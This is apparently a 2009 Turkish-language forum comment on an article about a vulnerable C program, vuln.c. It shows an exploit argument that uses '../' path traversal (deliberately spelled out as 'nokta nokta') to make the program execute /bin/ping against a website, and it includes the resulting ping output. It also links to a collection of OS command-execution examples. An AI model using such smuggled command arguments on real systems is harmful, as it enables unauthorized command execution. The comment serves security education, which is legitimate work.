26-04-2009 20:21

Güzel bir konuyu işlemişsiniz, paylaştığınız için teşekkürler.  
 
Aslında vuln.c isimli C kodunun içerdiği zafiyeti başka bir program üretmeden de exploit edebilirdik (özellikle sisteme erişimimiz olmadığı durumlarda; mesela web üzerinden bu daha çok işimize yarayabilir) bunu paylaşmak istedim. Mesela; 
 
./vuln "nokta nokta/nokta nokta/nokta nokta/nokta nokta/nokta nokta/bin/p_i_n_g www.webguvenligi.org" 
 
(nokta nokta yerlerini .. ile değiştiriniz. Ayrıca p_i_n_g'de bildiğiniz komut. Sitedeki WAF sağlam ayarlanmış :)) 
 
programın siteye icmp paketleri göndermesine yol açacaktır: 
 
PING www.webguvenligi.org (207.192.74.193) 56(84) bytes of data. 
64 bytes from www.webguvenligi.org (207.192.74.193): icmp_seq=1 ttl=64 time=0.035 ms 
64 bytes from www.webguvenligi.org (207.192.74.193): icmp_seq=2 ttl=64 time=0.050 ms 
 
--- www.webguvenligi.org ping statistics --- 
2 packets transmitted, 2 received, 0% packet loss, time 1000ms 
rtt min/avg/max/mdev = 0.035/0.042/0.050/0.009 ms 
 
real 0m1.473s 
user 0m0.000s 
sys 0m0.002s 
 
gibi.  
 
Diğer başka işletim sistemi komut çalıştırma kod örnekleri için; 
 
http://www.webguvenligi.org/belgeler 
 
altında yer alan 
 
http://docs.google.com/View?docid=dgqzqj5d_38cn7xb4fs  
 
belgesi de incelenebilir. Teknik yazı için tekrar teşekkürler.